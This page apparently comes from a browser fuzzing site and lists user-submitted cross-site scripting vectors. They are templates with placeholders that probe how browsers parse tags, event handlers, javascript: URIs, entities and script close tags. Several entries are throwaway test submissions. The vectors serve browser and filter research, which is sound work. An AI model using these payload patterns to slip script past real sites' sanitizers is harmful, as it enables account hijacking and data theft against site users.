Fuzz Vectors

Your browser identified as

General Crawlers unknown

All vectors

Description	Vector	Created by
characters between open angle bracket and tag name (fixed)	<chrimg src=xx:xx onerror=logChr(num)>	@Lamp_AE
characters between open angle bracket and tag name	<chrimg src=xx:xx onerror=logChr(chr)>	@Lamp_AE
char infront of attribute	<xss chronpointerrawupdate =alert(1) style=display:block>fuzzelementnum</xss>	@0xeirual
Characters that act as	chrimg src=xx:xx onerror=logChr(num*)>	@garethheyes
before 2	<a href="chr/google.com" id="fuzzelementnum">a</a>	@K4r1it0
TagName space	<imgchrsrc=x onerror=logChr(num)>	@VlbLeeuwarde
script close tag position 2	<script>logChr(num)</chrscript>	@jangamingnl1
script close tag position 1	<script>logChr(num)<chr/script>	@jangamingnl1
safari javascript protocol	<a href="javascriptchar:logChr(num)">click me</a>	@jangamingnl1
close tag construction chars	<script>logChr(num)<chrscript> <script>logChr(num)<chr/script> <script>logChr(num)chr/script>	@jangamingnl1
unicode tag	<chr><script>if (document.getElementsByTagName("chr").length > 0) {logChr(num)}</script>	@_Ronr_
test uno	<!-- sample vector --> <img src=xx:xx chronerror=logChr(num)>	@Artys_san
Single quote breakout	<img src=xx:xx test='chronerror=logChr(num)'>	@Nomicon3
Allowed characters before in href	<a href="javascriptchr&colon;alert(this.id)" id="fuzzelementnum">test</a>	@bananabr
chars allowed between a html entity	<!-- sample vector --> <img src=x onerror="&#xchr61lert(num);logChr(num);">	@S1r1u5_
valid JS statement separators firefox	<script> a=123chrb=444chrlogChr(num) </script>	@insertScript
valid JS statement separators chrome	<script> a=123chrb=444chrlogChr(num) </script>	@insertScript
Characters in between protocol in js url (FORK) XXX	<a href="javaschrcript:alert(1)" id="fuzzelementnum">test</a>	@igc_iv
Characters between event handlers	<img id="fuzznum" src=x onerrochrr='xx'>	@salchoman
testerdd	<a href="chrjavascript:alert(1)" id="fuzzelementnum">test</a>numnum	@script92538206
testfgdfgdf	<!-- sample vector --> <img src=xx:xx chronerror=logChr(num)>	@script92538206
test23	<!-- sample vector --> <img src=xx:xx chronerror=logChr(num)>urlenchex4raw2chrdatahtmlelements2020datajscsspropertynamesdatamathelementsdatasvgelementsdataShortHtmlElements	@Yang_Luchan
script tag fuxx	<script>logChr(num)</chrscript>	@FIabber
Tags with JS capable Events	<datahtmlelements src dataevents="customLog('datahtmlelements dataevents')"></datahtmlelements>	@Lamp_AE
Tags with Onerror	<datahtmlelements src onerror="customLog('datahtmlelements')"></datahtmlelements>	@Lamp_AE
Characters that can go on either side of in attribute	<!-- sample vector --> <img src onerrorchr=chrlogChr(num)>	@Lamp_AE
Valid HTML Attribute Seperators	<!-- sample vector --> <imgchrsrcchronerror=logChr(num)>	@Lamp_AE
Unicode characters that normalize to a dot in URLs	<!-- sample vector --> <img src=//lelchrwtf/hey.jpg onload=logChr(num)>	@Lamp_AE
test2	<script> function makeid(length) { var result = ''; var characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; var charactersLength = characters.length; for ( var i = 0; i < length; i++ ) { result += characters.charAt(Math.floor(Math.random() * charactersLength)); } return result; } document.write("<" + makeid(num) + " />") </script>	@HackingBrowser
test_browser_backdoor	<script> function makeid(length) { var result = ''; var characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; var charactersLength = characters.length; for ( var i = 0; i < length; i++ ) { result += characters.charAt(Math.floor(Math.random() * charactersLength)); } return result; } doaument.write("<" + makeid(num) + " />") </script>	@HackingBrowser
Just testing man	<script>var x = ''chrlogChr(num)chr'';</script>	@s0md3v
testxx	<!-- sample vector --> <script> logChr(num)chrchr hax</script>	@chmodxxx
characters that can assign values to attributes	<img srcchrx onerrorchrlogChr(num)>	@molenzwiebel
style2	<style></chrtyle><script>logChr(num)</script></style>	@Khangarood
style	<style></schrtyle><script>logChr(num)</script></style>	@Khangarood
ignored chars in html encoding and attributes2	<img src=x onerror="l&#chr111;gChr(num)//" />	@irsdl
close tag construction unicode	<script> logChr(num)<uniscript>	@_ttffdd_
close tag construction	<script>logChr(num)<raw1script>	@_ttffdd_
After open bracket	<chrimg src=x onerror=logChr(num)>	@HNThrowaway
uxss legend	<script> var uxss = document.createElement('uxss'); uxss.href = "http://naver.com/chr@google.com:443/"; if (uxss.href === "http://google.com") { logChr(num); } </script>	@hyeim8
uxssnd22	<a href="http://naver.com/chr@google.com:443/">num</a>	@hyeim8
test22	<script>prompt(chr);</script> <p>testcase:num</p>	@hyeim8
nnbbbbbbbff	<!-- sample vector --> <img src=xx:xx chronerror=logChr(num)>	@hyeim8
chars allowed between js commentmm	<script>/chr/'</script>	@hyeim8
uxlld	<script>//</datahtmlelements> alert(1); </script>	@hyeim8
uxll	<script><datahtmlelements>prompt(1)</datahtmlelements>	@hyeim8
kkkkkkkkkkkkkkkkkkkkkkkkkk	<a href="http://chrjavascript:alert(1)" id="fuzzelementnum">test</a>	@hyeim8
nnbbbbbbb	<a href="unijavascript:alert(1)" id="fuzzelementnum">test</a>	@hyeim8
Characters before javascript uri parsed	<a href="unijavascript:alert(1)" id="fuzzelementnum">test</a>	@freddyb
html elements that end scripts	<script>//</datahtmlelements> logChr(num); </script>	@Nomicon3
Characters that close strings in chrome 2	<!-- sample vector --> <script>var test = 'testchr;logChr(num);</script>	@Nomicon3
Saf2	chr>chr<chrimg chrsrc=1 onerrror=logChr(num)chr>chr -->	@ahpaleus
Safari	chr>chr<chrimg chrsrc=1 onerrror=alert(1)chr>chr -->	@ahpaleus
XSS without par	<script>alertchrlogChr(num)chr</script>	@ahpaleus
Name	<!-- sample vector --> <img src=xx:xx chronerror=logChr(num)>	@ArushiWish
xss 5	<script>auniunilert(chrlogChr(num))</script>	@ahpaleus
xss 4	<chrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrscript>alertraw1(logChr(num))</script>	@ahpaleus
svg xss 2	<>chrscriptchr+alert(logChr(num)) </script>	@ahpaleus
svg xss	<scriptchr+>alert(logChr(num)) </script>	@ahpaleus
SVG test 3	chr><svg/chronloadchrchrchr=chrchrchrlogChr(num)raw1><svg/chrdatahtmlattributeschrchrchr=chrchrchrlogChr(num)raw1>	@ahpaleus
SVG char	<!-- sample vector --> <img src=xx:xx chronerror=logChr(num)> <svgchrchrchrchrchronload=logChrchrchrnumchrchr><svgchrchrchrchrchrdatahtmlattributes=logChrchrchrnumchrchr>	@ahpaleus
New test 12	<!-- sample vector --> <chrchrchrchrsvg/chronload=alert(num)chr>	@ahpaleus
New test 2	<!-- sample vector --> <chrchrchrchrsvg/chronload=alert(num)chr>	@ahpaleus
dunno	<!-- sample vector --> <chrimg src='about:blank' onerror=logChr(num)>	@RobinsonLiamr
break out of img src	<!-- sample vector --> <img src="xx:xxchronerror=logChr(num)>	@missoum1307
testingxx	<!-- sample vector --> <img src=xx:xx chronerror=alert(chr)>	@chmodxxx
char after event	<!-- sample vector --> <img src=xx:xx onerrorchr=logChr(num)>	@chmodxxx
qqqsqdqd test	<a href="http:chr//qq.com">aaa</a>	@1baicai1
htm test2	<IFRAME SRC="javascriptchrlogChr(num);"></IFRAME>	@1baicai1
http test	<a href="javascriptchrlogChr(num)">aaa</a>	@1baicai1
On Event Header Based Testing	<img src=x chronError="javascript:log(num)"/>	@1baicai1
After reference	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <script xlink:href=datachr:,logChr(num)></script> </svg>	@marqueexss
Valid characters in on____ event handler attributes	<img src onchrerror=logChr(num)>	@Lamp_Sec
Equal	<img src="about:blank" onerrorchrlogChr(num)>	@synackozgur
Characters used for event handlers instead of equal sign	<img srcchr"about:blank">	@synackozgur
charsThatCloseAMutatedComment	<script> t = document.createElement('template'); t.innerHTML = '</chr<img src=xx:xx onerror=log(num)>'; document.body.appendChild(t); </script>	@salchoman
33333333333333	<!-- sample vector --> <img src=xx:xx onerrochrr=logChr(num)>	@nullfl0w
sdf2222222222222222	<img src=xx:xx chronerror=logChr(num)>	@nullfl0w
allowed characters in entities	<a id="fuzzelementnum" href="javascript&colchron;alert">aaa</a> <script> if(document.getElementById('fuzzelementnum').protocol==='javascript:'){ logChr(num); } </script>	@insertScript
chars before img tag	<chrimg src=xx:xx onerror=alert(chr)>	@chmodxxx
eating char (please god help )	<!-- sample vector --> <img src=x chr> onerror=logChr(num)>	@missoum1307
eating char	<!-- sample vector --> <img src=x chr> onerror=logChr(num)>	@missoum1307
doc property hijack with iframe v3	<script> var testpad = document.createElement("iframe"); testpad.name="dummy"; document.body.appendChild(testpad); for(props in document){ testpad.name = props; if (document[props]+"" === "[object Window]") { customLog(props) } } </script>	@insertScript
overwrite cookies test case	<datahtmlelements name="cookie"></datahtmlelements> <script> window.addEventListener("load",function(){ for(a in document.cookie){ customLog(document.cookie[a].tagName); } },false); </script>	@insertScript
form attribute support	<form id='datahtmlelements1'> </form> <datahtmlelements id='datahtmlelements2' form='datahtmlelements1'></datahtmlelements> <script> if (document.getElementById('datahtmlelements2').form == '[object HTMLFormElement]') { customLog('datahtmlelements') } </script>	@insertScript
script param separator	<script x=xchrsrc=data:,logChr(num)></script>	@i_bo0om
data uri img src	<img src="#chrdata:image/gif;base64,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" onload="logChr(num)">	@MisterJyu
img src starts with pound follow by fuzz char then data uri	<img src="#chrdata:image/gif;base64,R0lGODlhPQBEAPeoAJosM//AwO/AwHVYZ/z595kzAP/s7P+goOXMv8+fhw/v739/f+8PD98fH/8mJl+fn/9ZWb8/PzWlwv///6wWGbImAPgTEMImIN9gUFCEm/gDALULDN8PAD6atYdCTX9gUNKlj8wZAKUsAOzZz+UMAOsJAP/Z2ccMDA8PD/95eX5NWvsJCOVNQPtfX/8zM8+QePLl38MGBr8JCP+zs9myn/8GBqwpAP/GxgwJCPny78lzYLgjAJ8vAP9fX/+MjMUcAN8zM/9wcM8ZGcATEL+QePdZWf/29uc/P9cmJu9MTDImIN+/r7+/vz8/P8VNQGNugV8AAF9fX8swMNgTAFlDOICAgPNSUnNWSMQ5MBAQEJE3QPIGAM9AQMqGcG9vb6MhJsEdGM8vLx8fH98AANIWAMuQeL8fABkTEPPQ0OM5OSYdGFl5jo+Pj/+pqcsTE78wMFNGQLYmID4dGPvd3UBAQJmTkP+8vH9QUK+vr8ZWSHpzcJMmILdwcLOGcHRQUHxwcK9PT9DQ0O/v70w5MLypoG8wKOuwsP/g4P/Q0IcwKEswKMl8aJ9fX2xjdOtGRs/Pz+Dg4GImIP8gIH0sKEAwKKmTiKZ8aB/f39Wsl+LFt8dgUE9PT5x5aHBwcP+AgP+WltdgYMyZfyywz78AAAAAAAD///8AAP9mZv///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAKgALAAAAAA9AEQAAAj/AFEJHEiwoMGDCBMqXMiwocAbBww4nEhxoYkUpzJGrMixogkfGUNqlNixJEIDB0SqHGmyJSojM1bKZOmyop0gM3Oe2liTISKMOoPy7GnwY9CjIYcSRYm0aVKSLmE6nfq05QycVLPuhDrxBlCtYJUqNAq2bNWEBj6ZXRuyxZyDRtqwnXvkhACDV+euTeJm1Ki7A73qNWtFiF+/gA95Gly2CJLDhwEHMOUAAuOpLYDEgBxZ4GRTlC1fDnpkM+fOqD6DDj1aZpITp0dtGCDhr+fVuCu3zlg49ijaokTZTo27uG7Gjn2P+hI8+PDPERoUB318bWbfAJ5sUNFcuGRTYUqV/3ogfXp1rWlMc6awJjiAAd2fm4ogXjz56aypOoIde4OE5u/F9x199dlXnnGiHZWEYbGpsAEA3QXYnHwEFliKAgswgJ8LPeiUXGwedCAKABACCN+EA1pYIIYaFlcDhytd51sGAJbo3onOpajiihlO92KHGaUXGwWjUBChjSPiWJuOO/LYIm4v1tXfE6J4gCSJEZ7YgRYUNrkji9P55sF/ogxw5ZkSqIDaZBV6aSGYq/lGZplndkckZ98xoICbTcIJGQAZcNmdmUc210hs35nCyJ58fgmIKX5RQGOZowxaZwYA+JaoKQwswGijBV4C6SiTUmpphMspJx9unX4KaimjDv9aaXOEBteBqmuuxgEHoLX6Kqx+yXqqBANsgCtit4FWQAEkrNbpq7HSOmtwag5w57GrmlJBASEU18ADjUYb3ADTinIttsgSB1oJFfA63bduimuqKB1keqwUhoCSK374wbujvOSu4QG6UvxBRydcpKsav++Ca6G8A6Pr1x2kVMyHwsVxUALDq/krnrhPSOzXG1lUTIoffqGR7Goi2MAxbv6O2kEG56I7CSlRsEFKFVyovDJoIRTg7sugNRDGqCJzJgcKE0ywc0ELm6KBCCJo8DIPFeCWNGcyqNFE06ToAfV0HBRgxsvLThHn1oddQMrXj5DyAQgjEHSAJMWZwS3HPxT/QMbabI/iBCliMLEJKX2EEkomBAUCxRi42VDADxyTYDVogV+wSChqmKxEKCDAYFDFj4OmwbY7bDGdBhtrnTQYOigeChUmc1K3QTnAUfEgGFgAWt88hKA6aCRIXhxnQ1yg3BCayK44EWdkUQcBByEQChFXfCB776aQsG0BIlQgQgE8qO26X1h8cEUep8ngRBnOy74E9QgRgEAC8SvOfQkh7FDBDmS43PmGoIiKUUEGkMEC/PJHgxw0xH74yx/3XnaYRJgMB8obxQW6kL9QYEJ0FIFgByfIL7/IQAlvQwEpnAC7DtLNJCKUoO/w45c44GwCXiAFB/OXAATQryUxdN4LfFiwgjCNYg+kYMIEFkCKDs6PKAIJouyGWMS1FSKJOMRB/BoIxYJIUXFUxNwoIkEKPAgCBZSQHQ1A2EWDfDEUVLyADj5AChSIQW6gu10bE/JG2VnCZGfo4R4d0sdQoBAHhPjhIB94v/wRoRKQWGRHgrhGSQJxCS+0pCZbEhAAOw==">	@MisterJyu
Comma analog in script src data	<script src=data:chrlogChr(num)></script>	@i_bo0om
slash bla htest	<a href="/chrgoogle.com" id="fuzzelementnum">asdf</a> <script> if(document.getElementById('fuzzelementnum').hostname=="google.com") { logChr(num); } </script>	@insertScript
random test	<!DOCTYPE html> <html lang = "en-US"> <head> <meta charset = "UTF-8"> <title>monty.html</title> <link rel = "stylesheet" type = "text/css" href = "monty.css" /> </head> <body> <h1>Monty Python Quiz</h1> <form action = "monty.php" method = "post"> <fieldset> <p> <label>What is your name?</label> <select name = "name"> <option value = "Roger"> Roger the Shrubber </option> <option value = "Arthur"> Arthur, King of the Britons </option> <option value = "Tim"> Tim the Enchanter </option> </select> </p> <p> <label>What is your quest?</label> <span> <input type = "radio" name = "quest" value = "herring" /> To chop down the mightiest tree in the forest with a herring </span> <span> <input type = "radio" name = "quest" value = "grail" /> I seek the holy grail. </span> <span> <input type = "radio" name = "quest" value = "shrubbery" /> I’m looking for a shrubbery. </span> </p> <p> <label>How can you tell she's a witch?</label> <span> <input type = "raw3" name = "raw1" value = "raw2"/> She's got a witch nose. </span> <span> <input type = "checkbox" name = "hat" value = "hat"/> She has a witch hat. </span> <span> <input typechrraw1=chrraw1"checkbox" name = "newt" value = "newt" /> chrchrchrchrchrraw1 </span> </p> <button typechrraw1=chrraw1"submit"> chrchrchrchrchrchrraw1 </button> </fieldset> </form> </body> </html>	@kinmenhacker
Characters that eat JavaScript regex escapes	<script> var regexChars = /chr\$/g if(!("chr$".match(regexChars))) { logChr(num) } </script>	@tifkin_
Characters that modify JavaScript regex character classes	<script> var regexChars = /[chr.]/g if(!(".".match(regexChars))) { logChr(num) } <script>	@tifkin_
test all	<table> <thead> <tr><td>chr raw1</td>chr raw2<td>chr raw3</td></tr> </thead> <tbody> <tr><td>chr raw1</td>chr raw2<td>chr raw3</td></tr> </tbody> </table>urlencunihex6hex4hex2chrnumdatacsspropertynamesdatadhtmlpropsdataentitiesdataeventsdatahtmlattributesdatahtmlattributesdatahtmlattributesdatahtmlelementsdatahtmlelements2dataintsdatajscsspropertynamesdatajspropertiesdatajstestdatajstest3datajstest4datajstest5datamathelementsdatamyeventsdataprotocolsdataShortHtmlAttributesdataShortHtmlElementsdatasvgelements	@kinmenhacker
XSS Without Space Test 1	<!-- sample vector --> <link rel="canonical" href="http://example.com/path/test"><imgchrsrc="xx:xx"onerror="logChr(num)">	@irsdl
kinmens test	<!-- sample vector --> <hex2hex4hex6numchrurlencuni>	@kinmenhacker
Single characters that break attribute names	<div chr="><img src=xss:xss onerror=logChr(num)>">	@garethheyes
Characters that expands the URL length (host no xn)	<a href="http://chr/" id="fuzzelementnum">test</a>	@avlidienbrunn
Characters that expands the URL length (host)	<a href="http://chr/" id="fuzzelementnum">test</a>	@avlidienbrunn
Valid characters before domain 1	<iframe src="http://chrfuzz.shazzer.co.uk//" onload="if(this.contentWindow.document !== null){log(num)}"></iframe>	@avlidienbrunn
qqqqq	<iframe src="http:/chr/google.de"></iframe>	@D_Szameitat
xssk	<iframe src="....................................................................................................................................................................................................................:::::::::::::::::::::.................................................................................................."></iframe>chr	@D_Szameitat
sdsd	<iframe src="httpuni//www.google.de"></iframe>	@D_Szameitat
ffff	<iframe src="http://uni"></iframe>	@D_Szameitat
iiii	<iframe src="uni://www.w3schools.com"></iframe> <iframe src="hex6://www.w3schools.com"></iframe>	@D_Szameitat
frame	<frameset cols="200, "> <frame src="hex6:" name="navigation"> <frame src="uni*:" name="inhalt"> </frameset>	@D_Szameitat
AAAA	<script>window.open("numhex2uni://www.w3schools.com");</script>	@D_Szameitat
kkkkkkkkk	<!-- sample vector --> <img src=xx:xx chronerror=logChr(num)>	@D_Szameitat
Characters ignored in Javascript function call with unicode 2	<script>l\chru006fg(num)</script>	@garethheyes
Characters ignored in Javascript function call with unicode	<script>l\u006fchrg(num)</script>	@garethheyes
wunder	<svg toto="chr onload="logChr(num);"></svg>	@palindrom
Characters that break out of css urls latest	<div id="fuzzelementnum" style="background:url(about:blank?chr;color:#000000;x:);"></div>	@garethheyes
Characters that end script tags	<scriptchrtest>logChr(num)</script>	@JohnathanKuskos
Characters allowed before tagname in IE v2	<chrdiv style="x:expression(logChr(num))">	@albinowax
JavaScript characters that swallow the next character	<script>a='asdfchr\';logChr(num)//asdf'</script>	@tifkin_
Possibility of XSS via lead bytes	<html> <head> <title>Possibility of XSS via lead bytes... @irsdl</title> <!-- <meta charset="utf-8"> or <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> Ref: https://code.google.com/p/doctype-mirror/wiki/MetaCharsetAttribute --> </head> <body> <p><input size=20 value="chr"></p> <p><input size=20 value="<script>logChr(num)</script>"></p> <!-- References: http://powerofcommunity.net/poc2008/hasegawa.pptx http://websecurity.com.ua/2928/ https://bugzilla.mozilla.org/show_bug.cgi?id=690225 --> </body> </html>	@irsdl
Characters allowed at the start of a namespace	<chrfoo:img src="xx:xx" id="baznum" /> <script> if(document.getElementById("baznum")) { logChr(num); } </script>	@agasfasgasdasds
test3_kinmen	<!-- sample vector --> <img src=http://www.kinmen.gov.tw/chr onerror=logChr(num)>	@kinmenhacker
Crazy MSIE v3	<input value=""dataevents =customLog('dataevents') " type="text">	@Giutro
String quotes in JS context	<script>snum = chrnumchr;if (typeof snum == "string" && snum == "num") logChr(num);</script>	@blubbfiction
before_img	<!-- sample vector --> <chrimg src=xx:xx onerror=logChr(num)>	@han7er
o replacement in event handlers	<img src=xx:xx chrnerror=logChr(num)>	@blubbfiction
Characters that close tags	<scriptchrlogChr(num)</script>	@blubbfiction
Valid characters between attribute and value instead of	<img src=xx:xx onerrorchrlogChr(num)>	@blubbfiction
Replacement characters for between attribute and value	<img src=xx:xx onerrorchrlogChr(num)>	@blubbfiction
Characters that close a HTML comment 4	<!-- --chr> <img src=xxx:x onerror=log(num)> -->	@irsdl
Characters that separate JavaScript object key and value	<script> var obj = {"foo"chr"bar"}; logChr(num) </script>	@peksa
JavaScript operators that separate objects and scopes	<script> var v = {}chr{"string in blockscope"} logChr(num) </script>	@peksa
JavaScript operators that evaluate argument in variable assignment	<script> var v = {}chrlogChr(num) </script>	@peksa
Things that break from URIs javascript comments	<a href="javascript://chrlogChr(num)">aaa</a>	@0xAli
Characters allowed between event handlers and equal sign	<img src="about:blank" onerrorchr=logChr(num)>	@peksa
HTML input image tag attributes that run JavaScript	<input datahtmlattributes="customLog('datahtmlattributes')" type="image" src="about:blank">	@peksa
HTML input tag attributes that run JavaScript	<input datahtmlattributes="customLog('datahtmlattributes')" type="text">	@peksa
Characters that start JavaScript double quote strings	<script> chr"; logChr(num) </script>	@peksa
Characters that escape JavaScript single line comments	<script> // hmm chrlogChr(num) </script>	@peksa
Ignored characters in javascript protocol uris	<script> var a = document.createElement('a'); a.href = "java\uhex4script:alert()"; if (a.href === "javascript:alert()") { logChr(num); } </script>	@peksa
Characters that escape html input tag	<input value="" chr<script>logChr(num)</script> foo="" type="text">	@peksa
rand chr after opening tag	<chrimg/src=xx:xx onchrerror=logChr(num)>	@mehimansu
prompt	<!-- sample vector --> <img src=xx:xx chronerror=logChr(num)>	@sharath_unni
replacement	chrimg src=xx:xx onerror=logChr(num)>	@matttiko
Characters that close a HTML comment 0021	<!--chr><img src=xxx:x onerror=log(num)> -->	@matttiko
script var separator	<script> var a = "olol123chr <logChr(num)// </script>	@i_bo0om
svg animate onbegin	<svg id="svg" xmlns="http://www.w3.org/2000/svg"> <rect id="rectID" width="100" height="100" fill="green"> <animate id="selfID" onbegin=logChr(num) attributeName="x" begin="0s; selfID.end" dur="0.5s" from="0" to="100"/> </rect> </svg>	@JohnathanKuskos
char after lt and before still valid html	<chr,script>logChr(num);</script>	@p_laguna
stuff	<!-- sample vector --> <img src='xx:xxchr' onerror='logChr(num) baz= '>	@largenocream
Characters that separate JavaScript assignment statements	<script> var a={}chrb={}&logChr(num); </script>	@Giutro
object data separator	<objectchrdata="data:text/html;base64,PHNjcmlwdD5sb2dDaHIoKm51bSopPC9zY3JpcHQ+"></object>	@i_bo0om
Characters that allow a new statement to begin2	<script> var a={}chrb=logChr(num); </script>	@tifkin_
Characters that allow a new statement to begin	<script> var a={}chrlogChr(num); </script>	@tifkin_
testquote	<!-- sample vector --> <img src=xx:xx onerror=logChr(num)chr">	@matttiko
testabc	<!-- sample vector --> <img src=xx:xx chronerror=logChr(num)>	@matttiko
Characters that can be used to terminate entities in an href	<a href="javascript&colonchrlog(num)" id="fuzzelementnum">test</a>	@tifkin_
Data URI What can replace the in data	<script src="datachr,log(num)"></script>	@skeptic_fx
Characters that can be used close tags2	<script>logChr(num)<chrscript></script>	@tifkin_
Characters allowed between and in HTML entities in style attribute	<div style="x:expression(l&chr#x6F;gChr(num))">	@tifkin_
fssadf dfads fdasf	<!-- sample vector --> <img src=xx:xx chronerror=logChr(num)>	@phpdevops
img tag overflow2	<img src=http://runinfinity.com/wp-content/uploads/2012/01/Kinmen_Marathon_coursemap.jpg chrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchr onerror=logChr(num)>	@kinmenhacker
img tag overflow	<img src=xx:xx chrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchrchr onerror=logChr(num)>	@kinmenhacker
